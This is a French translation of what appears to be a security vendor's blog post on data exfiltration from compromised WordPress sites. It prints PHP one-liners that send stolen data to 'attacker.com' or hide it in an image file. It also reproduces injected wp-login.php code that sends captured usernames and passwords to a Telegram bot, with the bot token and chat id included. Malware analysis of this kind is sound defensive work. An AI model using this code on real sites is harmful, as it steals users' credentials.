L’un des sujets fréquemment abordés sur ce blog concerne les nombreuses méthodes et techniques créatives utilisées par les attaquants pour voler des données sur des sites Web compromis. Les skimmers de cartes de crédit, les pirates de l’air d’identification et de mots de passe, les injections SQL et même les logiciels malveillants au niveau du serveur peuvent tous être utilisés pour l’exfiltration de données.

De plus, les attaquants pourraient potentiellement accomplir cet exploit avec seulement quelques lignes de code. Par example:

Email aux données:

@mail("[email protected]", $_SERVER["SERVER_NAME"], $stolenData);

Écriture des données dans un fichier local:

fwrite($fh, $stolenData);

Envoi des données à une adresse e-mail sous le contrôle de l’attaquant:

@file_get_contents("http://attacker.com/cgi-bin/optimus.pl?prime=$stolenData");

Écrivez les données dans un fichier image sur le site Web pour ne pas éveiller les soupçons:

$hellowp=fopen('./wp-content/uploads/2018/07/[redacted].jpg','a+');
$write=fwrite($hellowp,$username_password,$time);

Récolte et exfiltration de données volées par télégramme

Une technique intéressante que notre équipe a rencontrée au cours des derniers mois consiste à utiliser l’API Telegram pour filtrer les données volées et les envoyer dans un message privé à un robot sous le contrôle de l’attaquant.

Nous avons récemment trouvé le code suivant qui a été injecté dans wp-login.php sur un site Web WordPress compromis.

$nan = $_POST['log'];
$pw  = $_POST['pwd'];
$hus = $_SERVER['SERVER_NAME'];
$loe = $_SERVER['REMOTE_ADDR'];
$pu  = date("d-m-Y H:i:s");

$fuki = "
                hus: $hus
                nan: $nan
                pw: $pw
                pu : $loe
                wate : $pu";
$fuki = wordwrap($fuki, 70);
//$file = fopen("/home/REDACTED/domains/REDACTED.com/public_html/wp-content/a.txt", "a");
//fwrite($file, $fuki);
file_get_contents("https://api.telegram[.]org/bot1305967562:AAHIKx1E24UCDxFG8wlStrj8qDWd3ZDaSDY/sendMessage?chat_id=1113291041&text=" . urlencode($fuki));

wp_redirect($redirect_to);
exit;

En insérant ce code directement dans wp-login.phpL’attaquant pourrait collecter des informations d’identification chaque fois qu’une action de connexion est effectuée.

L’exemple montre que la méthode d’origine a enregistré les données volées dans un fichier nommé « a.tx.t ». Soit ce n’était pas une solution viable à long terme, soit l’attaquant est devenu paresseux et a décidé d’utiliser une méthode différente en changeant le contenu pour demander à l’API de Telegram d’envoyer un message à son bot.

L’attaquant a utilisé file_get_contents pour faire leur demande à distance à l’URL API de Telegram et leur permettre de transmettre les données volées sans laisser beaucoup de preuves d’exfiltration sur le serveur. En ajoutant cette fonctionnalité, l’attaquant peut également accéder aux données volées en temps réel au lieu de vérifier un fichier texte pour les informations capturées.

La réplication de la demande obtient le JSON suivant:

{
  "ok":true,
  "result":{
     "message_id":80,
     "from":{
        "id":1305967562,
        "is_bot":true,
        "first_name":"wp-login",
        "username":"wplogin90bot"
     },
     "chat":{
        "id":1113291041,
        "first_name":"hana",
        "last_name":"lon turi",
        "type":"private"
     },
     "date":1602778337,
     "text":"STOLEN DATA GOES HERE"
  }
}

La demande de réponse indique que les données volées seront transférées à un bot nommé wplogin90bot et c’est la 80e demande qui a été envoyée ici. Nous pouvons également supposer que 80 messages ont été envoyés avec succès à propos de ces demandes, dont certains contenaient des informations potentiellement volées sur des sites Web compromis.

Conclusion et étapes d’atténuation

Le code semble évoluer et de nouvelles fonctionnalités sont ajoutées pour répondre aux besoins de l’attaquant. Comme il est encore en développement, il est possible que des techniques d’exfiltration comme celle-ci continuent d’utiliser de nouvelles fonctionnalités pour échapper à la détection et collecter et exfiltrer avec succès les données volées.

Des attaques comme celle-ci peuvent être difficiles à repérer. Pour minimiser le risque et prévenir les infections, nous recommandons vivement aux propriétaires de sites Web de mettre à jour leur logiciel avec les derniers correctifs de sécurité dès qu’ils sont disponibles. Suivez les directives pour Durcissement du site Webet tirez parti d’un Firewall d’applications Web pour corriger virtuellement les vulnérabilités connues.



Source link

Recent Posts